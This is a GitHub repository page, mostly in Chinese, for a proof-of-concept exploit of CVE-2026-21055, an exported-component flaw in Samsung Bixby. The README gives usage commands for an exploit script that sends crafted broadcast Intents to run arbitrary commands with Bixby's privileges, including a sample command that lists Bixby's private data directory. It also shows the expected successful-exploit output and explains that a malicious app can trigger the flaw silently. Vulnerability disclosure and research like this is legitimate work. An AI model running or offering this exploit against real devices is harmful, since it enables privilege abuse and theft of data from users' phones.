Hunt-Benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

GitHub: Hunt-Benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

针对 Samsung Bixby 组件导出不当漏洞(CVE-2026-21055)的概念验证工具,提供 AndroidManifest 组件分析与 Intent 广播命令执行的完整利用链。

Stars: 1 | Forks: 0

# CVE-2026-21055 PoC — Samsung Bixby 组件导出不当 **CVE-2026-21055** 的概念验证:在 4.0.70.8 版本之前的 Samsung Bixby 中存在 Android 应用组件不当导出的问题,允许本地攻击者以 Bixby 权限执行任意命令。 ## 概述 本仓库包含两个 Python 脚本: 1. **`analyze_components.py`** — 解析反编译后的 AndroidManifest.xml,以枚举导出的 activities、services、receivers 和 providers。标记出没有权限保护的已导出组件。 2. **`exploit.py`** — 通过 `adb shell am` 向 Bixby 导出的命令 receiver 发送特制的广播 Intent 来演示基于 Intent 的攻击,从而以 Bixby 的系统级权限执行命令。 ## 漏洞详情 | 字段 | 值 | |---|---| | **CVE ID** | CVE-2026-21055 | | **Samsung SVE** | SVE-2026-0917 | | **CVSS v4.0** | 8.5 — 高危 | | **CWE** | CWE-926 — Android 应用组件导出不当 | | **受影响应用** | Samsung Bixby (`com.samsung.android.bixby.agent`) | | **受影响版本** | < 4.0.70.8 | | **修复版本** | 4.0.70.8 | | **攻击向量** | 本地(同一设备上的恶意应用) | | **所需权限** | 无 | | **用户交互** | 无 | | **影响** | 以 Bixby 权限执行任意命令 | ## 前置条件 - 已安装 **adb** (Android SDK Platform Tools) 并将其添加到 PATH 环境变量中 - 一台已开启 USB 调试的 Samsung Galaxy 设备 - 目标设备上的 Bixby 版本 < 4.0.70.8 - 若要进行组件分析:需安装 **apktool** 并将其添加到 PATH 环境变量中 ## 用法 ### 1. 分析 Bixby 的导出组件 从设备中提取 Bixby APK 并进行反编译: ``` # 查找 Bixby 的 APK 路径 $ adb shell pm path com.samsung.android.bixby.agent # 提取 APK $ adb pull bixby.apk # 使用 apktool 反编译 $ apktool d bixby.apk -o bixby_decompiled -f ``` 运行分析脚本: ``` $ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml ``` 或者让脚本自动反编译: ``` $ python3 analyze_components.py --apk bixby.apk ``` ### 2. 在运行中的设备上列出导出组件 ``` $ python3 exploit.py --list ``` ### 3. 运行漏洞利用程序 ``` # 默认:执行 'id' 命令 $ python3 exploit.py # 自定义命令 $ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/" # 指定自定义 component(如果自动检测失败) $ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver ``` ### 预期输出 ``` ============================================================ CVE-2026-21055 PoC — Samsung Bixby Command Execution Improper Export of Android Application Components ============================================================ [*] Target package: com.samsung.android.bixby.agent [*] Bixby version: 4.0.69.2 [*] Vulnerable: YES (< 4.0.70.8) [*] Bixby UID on this device: 10xxx [*] Executing exploit... [*] Crafting exploit Intent... Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL Command: id Output: /data/local/tmp/bixby_poc_output [+] Intent sent. [+] Command output (executed with Bixby privilege): uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody) [+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege [+] Verify the output UID matches Bixby's UID: 10xxx ``` ## 工作原理 1. **组件导出**:Bixby 导出了一个或多个用于处理命令执行或自动化触发的组件(services/receivers)。这些组件设置了 `android:exported="true"` 被导出,但没有配置 `android:permission` 属性或进行运行时权限检查。 2. **Intent 传递**:设备上的任何应用都可以向这些导出的组件发送 Intent。该 Intent 携带一个 action 字符串(例如 `ACTION_RUN_SHELL`)以及包含要执行的命令和输出文件路径的 string extras。 3. **命令执行**:Bixby 导出的组件接收到该 Intent 后,提取命令并通过 `Runtime.exec()` 或类似机制执行。该命令在 Bixby 的进程上下文中运行,继承 Bixby 的所有系统级权限。 4. **无需用户交互**:此漏洞利用无需用户交互。恶意应用会在后台静默发送 Intent。 ## 免责声明 此 PoC 仅用于教育和安全研究目的。请仅在你拥有或获得明确授权的设备上进行测试。未经所有者同意,请勿对设备使用此漏洞利用程序。 ## 来源 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055 - Samsung Mobile Security Bulletin (2026 年 7 月): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07 - CWE-926: https://cwe.mitre.org/data/definitions/926.html
标签:PoC, 安全漏洞, 暴力破解, 本地提权, 目录枚举, 移动安全, 逆向工具